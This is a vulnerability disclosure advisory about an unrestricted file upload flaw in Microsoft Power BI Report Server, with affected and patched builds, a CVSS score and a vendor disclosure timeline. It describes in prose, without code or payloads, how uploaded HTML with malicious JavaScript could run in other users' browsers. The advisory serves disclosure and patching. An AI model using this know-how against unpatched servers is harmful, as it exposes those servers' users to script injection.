XLM-2019-712

XLM-2019-712

by adidionxlm

Abstract Advisory Information

Unrestricted file upload vulnerability in the comment section of Microsoft Power BI Report Server allows remote authenticated users to upload arbitrary files and to control the Content-Type value the server will use when a user is accessing the given file. For example, this could allow an attacker to upload HTML files containing a malicious JavaScript payload, which can then be accessed and executed by other users browser.

Authors: Samy Baiwir

Version affected

Name: Microsoft Power BI Report Server

Versions: 15.0.1102.299

Common Vulnerability Scoring System

4.3
CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N

Patches

Version 1.5.7074.36177 (Build 15.0.1102.371)

References

https://docs.microsoft.com/en-us/power-bi/report-server/changelog

Vulnerability Disclosure Timeline

  • 10/05/2019: vulnerability discovered on version 15.0.1102.235
  • 21/05/2019: vulnerability validated on last available version (15.0.1102.299)
  • 23/05/2019: First contact with Vendor
  • 29/05/2019: Vendor acknowledges and validate the vulnerability
  • 31/05/2019: Bug bounty submitted on msrc.microsoft.com
  • 10/07/2019: Fix released 1.5.7074.36177 (Build 15.0.1102.371)
  • 11/07/2019: Vendor confirm that no CVE-ID will be assign
  • 12/08/2019: Patch does not work, vendor re-contacted
  • 27/08/2019: Vendor acknowledges and validate the vulnerability
  • 05/09/2019: Vendor ask us to not publish the vulnerability
  •  19/09/2019: Vendor ask us to not publish the vulnerability
  • 17/10/2019: Vendor confirm a new fix is available 1.6.7236.4246 (Build 15.0.1102.646)
  • 09/12/2019: Public disclosure 
Top